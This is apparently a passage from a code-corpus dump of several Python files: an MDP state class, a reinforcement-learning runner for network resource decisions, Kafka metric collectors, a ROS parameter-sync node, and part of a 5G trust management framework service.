super(InternalError, self).__init__(message)
if logger is not None:
logger.error(message)
class ConfigurationError(Exception):
"""Error class for errors in the configuration file."""
def __init__(self, message, logger=None):
super(ConfigurationError, self).__init__(message)
if logger is not None:
logger.error(message)
```
#### File: ss-cno-teleimmersive-game/markovdp/state.py
```python
class State(object):
"""State Class.
The role of this class is to represent a state in the MDP Model.
Attributes:
_q_states (list): The q-states of this state
_value (double): The value of the state
_best_q_state (Q-state): Q-state with highest Q-value
_times_visited (int): The number of visits to this state
Args:
parameters (list): The list of parameters of this state
state_num (int): Unique number of state in MDP model
total_states (int): The total number of visited states
"""
def __init__(self, parameters=None, state_num=0, total_states=0):
"""State class constructor."""
self._best_q_state = None
self._parameters = [] if parameters is None else list(parameters)
self._q_states = []
self._state_num = state_num
self._times_visited = 0
self._total_states = total_states
self._value = 0
@property
def best_q_state(self):
"""Gets the Q-state with the highest Q-value"""
return self._best_q_state
@property
def parameters(self):
"""Gets list of the parameters for this state."""
return self._parameters
@property
def q_states(self):
"""Gets Q-states for the current state."""
return self._q_states
@property
def state_num(self):
"""Gets the unique number of the state in the MDP model."""
return self._state_num
@property
def total_states(self):
"""Gets the total number of states in MDP model."""
return self._total_states
@total_states.setter
def total_states(self, total_states):
self._total_states = total_states
@property
def value(self):
"""The current value of the state."""
return self._value
def visit(self):
"""Increments the number of times the state has been visited."""
self._times_visited += 1
def get_optimal_action(self):
"""Returns the optimal action for this state."""
return self._best_q_state.action
def best_action_num_taken(self):
"""Number of executions of the optimal action."""
return self._best_q_state.action_taken_times()
def update_value(self):
"""Updates the value of the state based on the values of its Q-states."""
self._best_q_state = self._q_states[0]
self._value = self._q_states[0].q_value
for q_state in self._q_states:
if q_state.q_value > self._value:
self._best_q_state = q_state
self._value = q_state.q_value
def add_new_parameter(self, name, values):
"""Adds a new parameter-value pair to the list of parameters of the state.
Args:
name (str): Name of parameter
values (double): Value of the parameter
"""
self._parameters.append((name, values))
def get_parameter(self, parameter):
"""Returns the value for the given parameter.
Args:
parameter (str): The name of a parameter
Returns:
value (double): The value of the parameter
"""
for param, value in self.parameters:
if param == parameter:
return value
return None
def add_q_state(self, q_state):
""" Adds a new Q-state to this State.
Args:
q_state (object): The Q-state to add to current State
"""
self._q_states.append(q_state)
if self._best_q_state is None:
self._best_q_state = q_state
def get_q_state(self, action):
"""Gets the Q-state that corresponds to the given action.
Args:
action (str, int): An action tuple with action name and value
Returns:
q_state (QState): Q-state corresponding to action
"""
for q_state in self._q_states:
if q_state.action == action:
return q_state
def get_max_transitions(self):
"""Maximum transition probability for any action.
Returns:
transitions (dict): Maximum transition probability per transition
"""
transitions = {}
for i in range(self._total_states):
for q_state in self._q_states:
if q_state.has_transition(i):
if i in transitions:
transitions[i] = max(transitions[i], q_state.get_transition(i))
else:
transitions[i] = q_state.get_transition(i)
return transitions
def get_legal_actions(self):
"""Returns all the possible actions from this state.
Returns:
actions (str, int): Possible actions for this state.
"""
return [q_state.action for q_state in self._q_states]
def __str__(self):
return "{}: {}".format(self._state_num, str(self._parameters))
def __repr__(self):
return str(self)
def print_detailed(self):
"""Prints the details of the state and its Q-states."""
print("{}: {}, visited: {}".format(self._state_num, str(self._parameters), self._times_visited))
for qs in self._q_states:
print(qs)
print()
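# --- Minimal usage sketch (added for illustration) ---
# _StubQState is a made-up stand-in exposing only the attributes State touches here
# (action, q_value); the real Q-state class lives elsewhere in the markovdp package.
if __name__ == "__main__":
    class _StubQState(object):
        def __init__(self, action, q_value):
            self.action = action
            self.q_value = q_value
    s = State(parameters=[("load", 0.5)], state_num=0, total_states=1)
    s.add_q_state(_StubQState(("add_worker", 1), 0.3))
    s.add_q_state(_StubQState(("no_op", 0), 0.7))
    s.update_value()
    print(s.get_optimal_action(), s.value)  # expected: ('no_op', 0) 0.7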
```
#### File: ss-cno-teleimmersive-game/runner/cno_algorithm_runner.py
```python
import json
import logging.config
import os
import os.path
from django.conf import settings
from markovdp.constants import MDP, MDP_DT, NO_OP
from markovdp.mdp_dt_model import MDPDTModel
from markovdp.mdp_model import MDPModel
from runner.constants import NO_OP
from runner.utils import reward as rewards
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
class CnoAlgorithmRunner(object):
"""CNO Algorithm Runner Class.
A wrapper class for the MDP and MDPDT model classes, responsible
for executing the MDP-based algorithmic flows.
"""
REWARD_CRITERIONS = \
('cost', 'qoe', 'qoe_and_cost_combined', 'measurements', 'no_of_profiles')
def __init__(self, conf_data):
"""CNO Algorithm Runner Constructor Class.
Parameters
----------
conf_data : dict
A dictionary for the configuration of the algorithm
"""
# Initialize the proper model
self._model_type = conf_data['model']
if self._model_type == MDP:
self._model = MDPModel(conf_data)
elif self._model_type == MDP_DT:
self._model = MDPDTModel(conf_data)
# Get the weights of each reward criterion
self._reward_criterions = conf_data['reward_criterions']
self._reward_criterions['cost'] = os.getenv('CNO_IM_COST', self._reward_criterions['cost'])
self._reward_criterions['qoe'] = os.getenv('CNO_IM_QOE', self._reward_criterions['qoe'])
self._reward_criterions['qoe_and_cost_combined'] = \
os.getenv('CNO_IM_QOE_COST_COMBINED', self._reward_criterions['qoe_and_cost_combined'])
self._reward_criterions['measurements'] = \
os.getenv('CNO_IM_MEASUREMENTS', self._reward_criterions['measurements'])
self._reward_criterions['no_of_profiles'] = \
os.getenv('CNO_IM_NO_OF_PROFILES', self._reward_criterions['no_of_profiles'])
# Set the training and result files.
self.training_file = os.getenv('CNO_IM_TRAINING_FILE', conf_data['training_file'])
self.results_file = os.getenv('CNO_IM_RESULTS_FILE', conf_data['results_file'])
# No measurements have been received yet
self.last_measurements = None
@property
def model(self):
"""Return the model."""
return self._model
@property
def reward_criterions(self):
"""Return the reward type."""
return self._reward_criterions
def train(self):
"""Executes the initial training of the algorithm, provided the existence of training data."""
# Skip training if training file does not exist
if self.training_file is None or not os.path.isfile(self.training_file):
logger.error('No training file, aborting training')
return
logger.debug("Starting training ...")
# Randomly select experiences
# os.system('shuf -n 1500 {} > training/random_experiences.txt'.format(self.training_file))
# self.training_file = 'training/random_experiences.txt'
experiences, skipped_experiences = 0, 0
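        # Each line of the training file is a JSON-encoded triple, unpacked below as:
        #   [old_measurements, [action_type, action_value], new_measurements]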
with open(self.training_file, 'r') as f:
for line in f:
old_measurements, action_list, new_measurements = json.loads(line)
action = tuple(action_list)
reward = self.get_reward(action=action,
old_measurements=old_measurements,
new_measurements=new_measurements)
self._model.set_state(old_measurements)
# Check if suggested action is legal and update model
legal_actions = self._model.get_legal_actions()
if action not in legal_actions:
skipped_experiences += 1
continue
self._model.update(action, new_measurements, reward)
experiences += 1
if experiences % 100 == 0:
self._model.prioritized_sweeping()
logger.debug('Trained with experience {}'.format(experiences))
logger.debug('Trained the model with {} experiences, skipped {}'.format(experiences, skipped_experiences))
def set_state(self, measurements):
"""Sets the state of the model.
Parameters
----------
measurements : dict
A dictionary of measurements
"""
self.last_measurements = measurements
self._model.set_state(measurements)
logger.debug("State set based on measurements")
def update(self, action, measurements, reward=None):
"""Updates the model and saves the experience.
Parameters
----------
action : tuple
The recently taken action
measurements : dict
A dictionary of measurements
reward : float
The reward acquired after the action
"""
if reward is None:
reward = self.get_reward(action, self.last_measurements, measurements)
experience = [self.last_measurements, action, measurements]
if self.results_file is None:
self.results_file = self.training_file
if self.results_file is not None:
with open(self.results_file, "a") as f:
f.write(json.dumps(experience) + '\n')
f.flush()
logger.debug("Recorded experience")
self.last_measurements = measurements
self._model.update(action, measurements, reward)
def set_splitting(self, split_criterion, cons_trans=True):
"""Sets the splitting criterion for MDP-DT.
Args:
split_criterion (str): The selected splitting criterion
cons_trans:
"""
if self._model_type != MDP_DT:
logger.error("Splitting criteria apply only to MDP_DT models!")
return
self._model.set_splitting_criterion(split_criterion, cons_trans)
def get_reward(self, action, old_measurements=None, new_measurements=None):
"""Computes the reward of the latest action.
This function serves as a selector of the reward type, based on the initial configuration of the model.
The types of the rewards that are supported include a QoE-based reward, a measurement-based reward, a
mixed reward and a combined QoE and cost based reward.
Parameters
----------
action : tuple
The executed action type and action value pair
old_measurements : dict, optional
A dictionary of the previous measurements
new_measurements : dict, optional
A dictionary of the last measurements
Returns
-------
reward : float
The computed reward
"""
action_type, action_value = action
reward = 1
if action_type != NO_OP:
cost_reward = 0 if self._reward_criterions['cost'] == 0 \
else rewards.cost_reward(new_measurements['percentage_of_gpu_users'])
measurements_reward = 0 if self._reward_criterions['measurements'] == 0 \
else rewards.measurement_reward(old_measurements, new_measurements)
no_of_profiles_reward = 0 if self._reward_criterions['no_of_profiles'] == 0 \
else rewards.no_of_profiles_reward(old_measurements['no_of_profiles_produced'],
new_measurements['no_of_profiles_produced'])
qoe_reward = 0 if self._reward_criterions['qoe'] == 0 \
else rewards.qoe_reward(old_measurements['mean_opinion_score'], new_measurements['mean_opinion_score'])
qoe_and_cost_combined_reward = 0 if self._reward_criterions['qoe_and_cost_combined'] == 0 \
else rewards.qoe_and_cost_combined_reward(new_measurements['qoe_sum'],
new_measurements['transcoding_cost'])
reward = \
cost_reward * self._reward_criterions['cost'] + \
measurements_reward * self._reward_criterions['measurements'] + \
no_of_profiles_reward * self._reward_criterions['no_of_profiles'] + \
qoe_and_cost_combined_reward * self._reward_criterions['qoe_and_cost_combined'] + \
qoe_reward * self._reward_criterions['qoe']
return reward * self._model.discount
def get_legal_actions(self):
"""Retrieves the legal actions from the current state."""
return self._model.get_legal_actions()
def get_suggested_action(self):
"""Returns the suggested action for the current state."""
return self._model.suggest_action()
def set_stat_test(self, statistical_test):
"""Set statistical test for MDP-DT splitting
Parameters
----------
statistical_test : str
The statistical test for splitting
"""
self._model.statistical_test = statistical_test
```
#### File: management/commands/metric_collector.py
```python
import json
import logging
from django.core.management import BaseCommand
from runner.config import KAFKA_TRANS_TOPIC, METRICS_WHITELIST, KAFKA_PREP_TOPIC
from runner.constants import VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS
from runner.utils.kafka import KafkaExporter, init_consumer_and_subscribe
logger = logging.getLogger('metric_collector')
def metric_collector():
"""Connects on Kafka Bus and collects metrics for active vTranscoders and spectators. """
# Initialize consumer and exporter
consumer = init_consumer_and_subscribe(topic=KAFKA_TRANS_TOPIC,
group_id_suffix='IMMERSIVE_MEDIA_PREPROCESSING')
kafka_exporter = KafkaExporter()
# Metrics Dict
metrics_per_resource_id = {}
for msg in consumer:
try:
payload = json.loads(msg.value.decode('utf-8', 'ignore'))
except json.JSONDecodeError as jde:
logger.error(jde)
continue
# Check if VIM tag is the required
vim_tag = payload['mano']['vim']['tag']
if vim_tag not in [VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS]:
logger.debug('VIM tag was {}. Ignoring ...'.format(vim_tag))
continue
# Check if metric is in whitelist
if payload['metric']['name'] not in METRICS_WHITELIST:
logger.debug('Metric was {}. Ignoring ...'.format(payload['metric']['name']))
continue
# Get metric details
mano_vdu_id = payload['mano']['vdu']['id']
metric = payload['metric']
metric_name = metric['name']
metric_value = metric['value']
metric_timestamp = metric['timestamp']
# If the metrics refer to spectators
if vim_tag == VTRANSCODER_3D_SPECTATORS:
client_id = payload['spectator']['client_id']
group_id = payload['spectator']['group_id']
resource_id = (client_id, group_id, mano_vdu_id)
logger.debug('Received metric [{}] for resource [{}].'.format(metric_name, resource_id))
if resource_id in metrics_per_resource_id.keys():
if metrics_per_resource_id[resource_id][metric_name] is None:
metrics_per_resource_id[resource_id][metric_name] = metric_value
if None not in metrics_per_resource_id[resource_id].values():
payload.pop('metric')
payload['timestamp'] = metric_timestamp
payload['measurements'] = metrics_per_resource_id[resource_id]
logger.info('Collected measurements for resource [{}]: `{}`'
.format(resource_id, payload['measurements']))
kafka_exporter.publish_message(KAFKA_PREP_TOPIC, payload)
metrics_per_resource_id[resource_id] = dict.fromkeys(metrics_per_resource_id[resource_id], None)
else:
                logger.debug('Resource [{}] has now been recorded.'.format(resource_id))
metrics_per_resource_id[resource_id] = {
'bitrate_aggr': None,
'bitrate_on': None,
'framerate_aggr': None,
'framerate_on': None,
'latency_aggr': None,
'working_fps': None,
'output_data_bytes': None,
'theoretic_load_percentage': None
}
metrics_per_resource_id[resource_id][metric_name] = metric_value
# If the metrics refer to vTranscoders
if vim_tag == VTRANSCODER_3D:
for resource in metrics_per_resource_id.keys():
if resource[-1] == mano_vdu_id:
logger.debug('Set metric [{}] for resource [{}].'.format(metric_name, resource))
metrics_per_resource_id[resource][metric_name] = metric_value
class Command(BaseCommand):
def handle(self, *args, **options):
metric_collector()
```
#### File: management/commands/publish_metrics_for_qoe.py
```python
import json
import logging
import random
import time
from datetime import datetime
from django.core.management import BaseCommand
from kafka import KafkaProducer
from kafka.errors import KafkaError
from cno.settings.base import LOGGING
from runner.config import KAFKA_API_VERSION, KAFKA_SERVER
from simulation.constants import mano
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def publish_metrics_for_qoe():
# Kafka Producer Set Up
# https://kafka-python.readthedocs.io/en/master/apidoc/KafkaProducer.html
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, api_version=KAFKA_API_VERSION,
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
while True:
# Push the metric values in batch per container ID
prep_metric = {
'mano': mano,
'measurements':
{
'working_fps': 11,
'output_mesh_size_bytes': 45000,
'output_textures_size_bytes': 25000,
'container_network_transmit_packets_dropped_total': random.uniform(0, 2)
},
'timestamp': datetime.now().isoformat()
}
request = producer.send('ns.instances.prep', key=b'qoe', value=prep_metric)
try:
request.get(timeout=60)
except KafkaError as ke:
logger.error(ke)
time.sleep(30)
class Command(BaseCommand):
def handle(self, *args, **options):
publish_metrics_for_qoe()
```
#### File: management/commands/simulate.py
```python
import json
import logging.config
from django.conf import settings
from django.core.management import BaseCommand
from kafka import KafkaConsumer, KafkaProducer
from kafka.errors import KafkaError
from runner.cno_algorithm_runner import CnoAlgorithmRunner
from simulation.config import KAFKA_TOPIC_PATTERN, KAFKA_API_VERSION, KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_GROUP_ID, \
KAFKA_PLANNING_TOPIC
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
def simulate():
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID, enable_auto_commit=True,
value_deserializer=lambda v: json.loads(v.decode('utf-8', 'ignore')),
api_version=KAFKA_API_VERSION, group_id=KAFKA_GROUP_ID)
consumer.subscribe(pattern=KAFKA_TOPIC_PATTERN)
logger.debug('Initialized Kafka Consumer & subscribed to pre-processing topic')
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID,
value_serializer=lambda v: json.dumps(v).encode('utf-8'),
api_version=KAFKA_API_VERSION, )
logger.debug('Initialized Kafka Producer')
# Initialize CNO Algorithm Runner for Simulation
runner = CnoAlgorithmRunner('simulation')
# Train MDP Model
runner.train()
# Run simulation for 100 collections of measurements
awaiting_reward, old_measurements = False, {}
for msg in consumer:
if msg.key is None:
continue
if msg.key.decode('utf-8') != 'sim':
continue
if awaiting_reward:
# Get reward
reward = runner.get_reward((action_type, action_value), old_measurements, measurements)
# Record experience and update
runner.update((action_type, action_value), measurements, reward)
old_measurements = measurements
awaiting_reward = False
continue
# Get measurements, set state, get suggested action
measurements = msg.value['measurements']
runner.set_state(measurements)
action_type, action_value = runner.get_suggested_action()
logger.info('Received set of measurements {}. Suggested Action: {} {}'
.format(measurements, action_type, action_value))
# Remove measurements from message
# msg.pop('measurements')
# Record the action and publish to (P)lanning for (E)xecution of action
# analysis['analysis'] = {'action': action_type, 'value': action_value}
# Publish to Kafka
request = producer.send(KAFKA_PLANNING_TOPIC, {'analysis': {'action': action_type, 'value': action_value}})
try:
request.get(timeout=60)
except KafkaError as ke:
logger.error(ke)
runner.model.print_state_details()
logger.debug('Simulation has finished')
class Command(BaseCommand):
def handle(self, *args, **options):
simulate()
``` |
{
"source": "5G-Sentosa/its_multimaster",
"score": 2
} |
#### File: fkie_master_sync/nodes/param_sync.py
```python
import rospy
from fkie_master_discovery.common import masteruri_from_master
from fkie_multimaster_msgs.msg import MasterState
def master_changed(msg, cb_args):
param_cache, local_master, __add_ns, __ignore, __only = cb_args
local_name = ''
if local_master:
local_name = local_master[0]
if msg.master.uri != masteruri_from_master() and local_name in param_cache:
master_to = rospy.MasterProxy(masteruri_from_master())
master_from = rospy.MasterProxy(msg.master.uri)
rospy.logdebug("Getting params from {}...".format(msg.master.uri))
params_from = master_from.getParam('/')[2]
if not __add_ns:
for key in ['run_id', 'rosversion', 'roslaunch', 'rosdistro', 'master_sync', 'master_discovery', 'capabilities', 'mastername', 'robots']:
try:
del params_from[key]
except Exception:
pass
for key in __ignore + [local_name, '/'+local_name]:
try:
del params_from[key]
except Exception:
pass
if __only:
            for key in list(params_from.keys()):
if key not in __only:
del params_from[key]
rospy.logdebug("Syncing params from {} to {}...".format(msg.master.name, local_name))
if __add_ns:
_ns = msg.master.name
else:
_ns = ''
rospy.logdebug("Got {} params.".format(len(params_from)))
if param_cache.get(_ns, None) != params_from:
param_cache[_ns] = params_from
for key, value in params_from.items():
master_to.setParam('/'+_ns+key, value)
rospy.logdebug("Done syncing params from {} to {}.".format(msg.master.name, local_name))
else:
rospy.logdebug("Params have not changed from {} to {}.".format(msg.master.name, local_name))
else:
local_name = msg.master.name
local_master.append(local_name)
master_from = rospy.MasterProxy(msg.master.uri)
rospy.logdebug("Getting params from local {}...".format(msg.master.uri))
param_cache[local_name] = master_from.getParam('/')[2]
rospy.logdebug("Got {} local params.".format(len(param_cache[local_name])))
def main():
rospy.init_node('param_sync', log_level=rospy.DEBUG)
param_cache = dict()
local_master = list()
masteruri_from_master()
__add_ns = rospy.get_param('~add_ns', True)
__ignore = rospy.get_param('~ignore', [])
__only = rospy.get_param('~only', [])
sub = rospy.Subscriber('master_discovery/changes', MasterState, master_changed, callback_args=(param_cache, local_master, __add_ns, __ignore, __only))
rospy.spin()
if __name__ == '__main__':
main()
``` |
{
"source": "5GZORRO/5G-TRMF",
"score": 2
} |
#### File: 5G-TRMF/peer_Trust_Model/trustManagementFramework.py
```python
import json
import sys
import logging
from flask import Flask, request
from flask_restful import Resource, Api
from gevent.pywsgi import WSGIServer
import random
import time
import requests
import ast
import re
from pymongo import MongoClient
import pprint
import csv
import threading
from threading import Lock
from dotenv import load_dotenv
from peerTrust import *
from producer import *
from consumer import *
from trustInformationTemplate import *
from datetime import datetime
from multiprocessing import Process, Value, Manager
logging.basicConfig(level=logging.INFO)
import queue
from gevent import monkey
monkey.patch_all()
app = Flask(__name__)
api = Api(app)
producer = Producer()
consumer = Consumer()
peerTrust = PeerTrust()
data_lock = Lock()
trustInformationTemplate = TrustInformationTemplate()
client = MongoClient(host='mongodb-trmf', port=27017, username='5gzorro', password='password')
db = client.rptutorials
mongoDB = db.tutorial
dlt_headers = ["trustorDID","trusteeDID", "offerDID", "userSatisfaction","interactionNumber","totalInteractionNumber", "currentInteractionNumber"]
dlt_file_name = 'DLT.csv'
provider_list = []
considered_offer_list = []
consumer_instance = None
history = {}
trustor_acquired = False
trustorDID = ""
update_catalog = False
thread_catalog = False
timestamp_thread_catalog = 0
TIME_TO_UPDATE_CATALOG_INFO = 600
gather_time = 0
compute_time = 0
storage_time = 0
update_time = 0
satisfaction = 0
credibility = 0
TF = 0
CF = 0
offer_type = {}
product_offering = []
old_product_offering = []
statistic_catalog = []
threads = list()
""" Parameters to define a minimum interactions in the system and avoid a cold start"""
max_previous_providers_DLT = 4
max_previous_providers_interactions_DLT = 3
max_previous_interactions_DLT = max_previous_providers_DLT * max_previous_providers_interactions_DLT
def find_by_column(column, value):
""" This method discovers interactions registered in the DLT looking at one specific value"""
list = []
"""with open(filename) as f:
reader = csv.DictReader(f)
for item in reader:
if item[column] == value:
list.append(item)"""
for interaction in peerTrust.kafka_interaction_list:
if interaction[column] == value:
list.append(interaction)
return list
def write_data_to_csv(filename, rows):
with open(filename, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=dlt_headers)
writer.writerows(rows)
def write_only_row_to_csv(filename, row):
with open(filename, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=dlt_headers)
writer.writerow(row)
class initialise_offer_type(Resource):
""" This class recaps the type of offers being analysed per request. Then, the informatation is leveraged by the
Computation and Update classes"""
def post(self):
global offer_type
req = request.data.decode("utf-8")
offer_type = json.loads(req)
return 200
class start_data_collection(Resource):
""" This method is responsible for creating the minimum information in the 5G-TRMF framework
to avoid the cold start """
def post(self):
global trustor_acquired
global gather_time
global compute_time
global storage_time
global update_time
global satisfaction
global credibility
global TF
global CF
global considered_offer_list
global update_catalog
global thread_catalog
global timestamp_thread_catalog
gather_time, compute_time, storage_time, update_time, satisfaction, credibility, TF, CF = 0, 0, 0, 0, 0, 0, 0, 0
trustor_acquired = False
max_trust_score = 0
max_trust_score_offerDID = ""
time_file_name = 'tests/time.csv'
time_headers = ["start_timestamp","end_timestamp","total_time", "total_without_cold", "cold_time", "gather_time", "compute_time",
"storage_time", "update_time","satisfaction","credibility","TF", "CF", "offers"]
req = request.data.decode("utf-8")
dict_product_offers = json.loads(req)
initial_timestamp = time.time()
trust_scores = []
list_product_offers = {}
considered_offer_list = []
kafka_minimum_interaction_list = []
""" Loading Catalog information and launching thread to update info after 10 minutes"""
if not update_catalog:
self.gatherin_POs_catalog(False)
update_catalog = True
timestamp_thread_catalog = int(str(time.time()).split(".")[0])
else:
if not thread_catalog and int(str(time.time()).split(".")[0]) - timestamp_thread_catalog >= TIME_TO_UPDATE_CATALOG_INFO:
x = threading.Thread(target=self.gatherin_POs_catalog, args=(True,))
x.start()
thread_catalog = True
timestamp_thread_catalog = int(str(time.time()).split(".")[0])
elif thread_catalog and int(str(time.time()).split(".")[0]) - timestamp_thread_catalog >= TIME_TO_UPDATE_CATALOG_INFO:
x = threading.Thread(target=self.gatherin_POs_catalog, args=(True,))
x.start()
timestamp_thread_catalog = int(str(time.time()).split(".")[0])
""" If it is not the first time that the 5G-TRMF is executed, it should retrieve information from the MongoDB
in case of such an information is not already loaded in the historical parameter """
for trustee in dict_product_offers:
if trustor_acquired == False:
trustorDID = dict_product_offers[trustee]
list_product_offers['trustorDID'] = trustorDID
trustor_acquired = True
else:
for offer in dict_product_offers[trustee]:
considered_offer_list.append({'trusteeDID': trustee, 'offerDID': offer})
""" In case of first time the 5G-TRMF is executed, we should retrieve information from MongoDB and
check if it is already or not in the historical"""
previous_interaction = mongoDB.find({'trustee.offerDID': offer})
offer_found = False
if previous_interaction is not None:
for interaction in previous_interaction:
del interaction['_id']
if interaction['trustor']['trusteeDID'] == trustee and \
interaction['trustor']['offerDID'] == offer:
if interaction not in peerTrust.historical:
peerTrust.historical.append(interaction)
offer_found = True
if not offer_found:
if trustee in list_product_offers:
list_product_offers[trustee].append(offer)
else:
list_product_offers[trustee] = [offer]
#consumer.start("TRMF-interconnections")
#consumer.subscribe("TRMF-interconnections")
#cold_start_info = consumer.start_reading_cold_start(max_previous_interactions_DLT)
consumer.start("TRMF-interconnections")
consumer.subscribe("TRMF-interconnections")
kafka_minimum_interaction_list = consumer.start_reading_minimum_interactions()
if len(list_product_offers) >= 1 and bool(kafka_minimum_interaction_list):
peerTrust.kafka_interaction_list = kafka_minimum_interaction_list
""" Adding a set of minimum interactions between entities that compose the trust model """
#if len(list_product_offers)>1 and not bool(cold_start_info):
#minimum_data = peerTrust.minimumTrustValuesDLT(producer, consumer, trustorDID, list_product_offers)
#for data in minimum_data:
#producer.createTopic("TRMF-interconnections")
#producer.sendMessage("TRMF-interconnections", trustorDID, data)
#producer.createTopic("TRMF-historical")
#producer.sendMessage("TRMF-historical", trustorDID, peerTrust.historical)
#elif len(list_product_offers) >= 1 and bool(cold_start_info):
#"If we don't have the minimum stakeholder interactions we load from Kafka"
#if not bool(peerTrust.historical):
#consumer.start("TRMF-historical")
#consumer.subscribe("TRMF-historical")
#historical = consumer.start_reading_minimum_historical()
#peerTrust.kafka_interaction_list = kafka_minimum_interaction_list
#print("Kafka Cargado: ", peerTrust.kafka_interaction_list)
#for i in historical:
#if i not in peerTrust.historical:
#peerTrust.historical.append(i)
#"Adding a set of minimum interaction between entities but generated by other TRMF"
#backup = []
#for trustee in cold_start_info:
#backup.append(cold_start_info[trustee])
#if trustee not in peerTrust.list_additional_did_providers:
#peerTrust.list_additional_did_providers.append(trustee)
#"If we don't have the minimum stakeholder interactions we load from Kafka"
#if not all(elem in peerTrust.kafka_interaction_list for elem in kafka_minimum_interaction_list):
#peerTrust.kafka_interaction_list = kafka_minimum_interaction_list
#print("Kafka Cargado: ", peerTrust.kafka_interaction_list)
#peerTrust.list_additional_did_offers = backup
trustor_acquired = False
for trustee in dict_product_offers:
if trustor_acquired == False:
trustor_acquired = True
else:
for offer in dict_product_offers[trustee]:
if trustee+"$"+offer not in provider_list:
provider_list.append(trustee+"$"+offer)
""" we generated initial trust information to avoid the cold start"""
print("$$$$$$$$$$$$$$ Starting cold start procces on ",trustee, " $$$$$$$$$$$$$$\n")
for key, value in list_product_offers.items():
if offer in value:
peerTrust.generateHistoryTrustInformation(producer, consumer, trustorDID, trustee, offer, 3)
""" Establish two new interactions per each provider"""
#peerTrust.setTrusteeInteractions(producer, consumer, trustee, 2)
print("\n$$$$$$$$$$$$$$ Ending cold start procces on ",trustee, " $$$$$$$$$$$$$$\n")
""" Retrieve information from trustor and trustee """
data = {"trustorDID": trustorDID, "trusteeDID": trustee, "offerDID": offer, "topicName": trustorDID}
response = requests.post("http://localhost:5002/gather_information", data=json.dumps(data).encode("utf-8"))
response = json.loads(response.text)
if response["trust_value"] > max_trust_score:
max_trust_score = response["trust_value"]
max_trust_score_offerDID = response["trusteeDID"]["offerDID"]
trust_scores.append(response)
"We are currently registering as a new interaction the offer with the highest trust score"
for interaction in reversed(peerTrust.historical):
if interaction["trust_value"] == max_trust_score and \
interaction["trustor"]["offerDID"] == max_trust_score_offerDID:
"""data = {"trustorDID": trustorDID, "trusteeDID": interaction["trustor"]["trusteeDID"], "offerDID": max_trust_score_offerDID,
"userSatisfaction": interaction["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": interaction["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interaction["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": interaction["currentInteractionNumber"]}"""
" Modifying the interaction number as the most recent one "
interaction["currentInteractionNumber"] = peerTrust.getCurrentInteractionNumber(trustorDID)
interaction["trustor"]["direct_parameters"]["totalInteractionNumber"] = \
peerTrust.getLastTotalInteractionNumber(interaction["trustor"]["trusteeDID"])
load_dotenv()
trmf_endpoint = os.getenv('TRMF_5GBARCELONA')
message = {"trustorDID": trustorDID, "trusteeDID": interaction["trustor"]["trusteeDID"], "offerDID": max_trust_score_offerDID,
"interactionNumber": interaction["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interaction["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": interaction["currentInteractionNumber"], "timestamp": interaction["endEvaluationPeriod"],
"endpoint":trmf_endpoint}
#write_only_row_to_csv(dlt_file_name, data)
#producer.start()
producer.createTopic("TRMF-interconnections")
producer.sendMessage("TRMF-interconnections",max_trust_score_offerDID, message)
"Adjusting the parameters based on new interactions"
#interaction["trustor"]["direct_parameters"]["interactionNumber"] = message["interactionNumber"]
#interaction["currentInteractionNumber"] = message["currentInteractionNumber"]
#peerTrust.historical.append(interaction)
if not os.path.exists("tests"):
os.makedirs("tests")
"Time measurements of the different phases to perform internal tests"
if not os.path.exists(time_file_name):
with open(time_file_name, 'w', encoding='UTF8', newline='') as time_data:
writer = csv.DictWriter(time_data, fieldnames=time_headers)
writer.writeheader()
data = {"start_timestamp": initial_timestamp,"end_timestamp": time.time(), "total_time": time.time()-initial_timestamp,
"total_without_cold": gather_time+compute_time+storage_time+update_time,"cold_time":
time.time()-initial_timestamp-gather_time-compute_time-storage_time-update_time,
"gather_time": gather_time, "compute_time": compute_time, "storage_time": storage_time,
"update_time": update_time, "satisfaction": satisfaction, "credibility": credibility,
"TF": TF, "CF": CF, "offers": 1000}
writer.writerow(data)
else:
with open(time_file_name, 'a', encoding='UTF8', newline='') as time_data:
writer = csv.DictWriter(time_data, fieldnames=time_headers)
data = {"start_timestamp": initial_timestamp,"end_timestamp": time.time(), "total_time": time.time()-initial_timestamp,
"total_without_cold": gather_time+compute_time+storage_time+update_time,"cold_time":
time.time()-initial_timestamp-gather_time-compute_time-storage_time-update_time,
"gather_time": gather_time, "compute_time": compute_time, "storage_time": storage_time,
"update_time": update_time, "satisfaction": satisfaction, "credibility": credibility,
"TF": TF, "CF": CF, "offers": 1000}
writer.writerow(data)
return json.dumps(trust_scores)
def gatherin_POs_catalog(self, update_statistic):
global statistic_catalog
global old_product_offering
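        # statistic_catalog holds one dict per provider, built below from the Catalog data:
        #   {"provider": <DID>, "n_resource": <total POs>, "<x>_<y>_<z>": <POs at that location>,
        #    "active": <active POs>, "active_<location>": ..., "active_<category>": ...,
        #    "active_<category>_<location>": ...}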
if not bool(statistic_catalog) or update_statistic:
"""Requesting all product offering objects"""
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering")
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering")
product_offering = json.loads(response.text)
if bool(product_offering) and product_offering != old_product_offering:
"If there is any change in the Catalog, we need to update all statistics"
statistic_catalog = []
for i in product_offering:
"Delete once the HTTP request will not be filtered in 5GBarcelona"
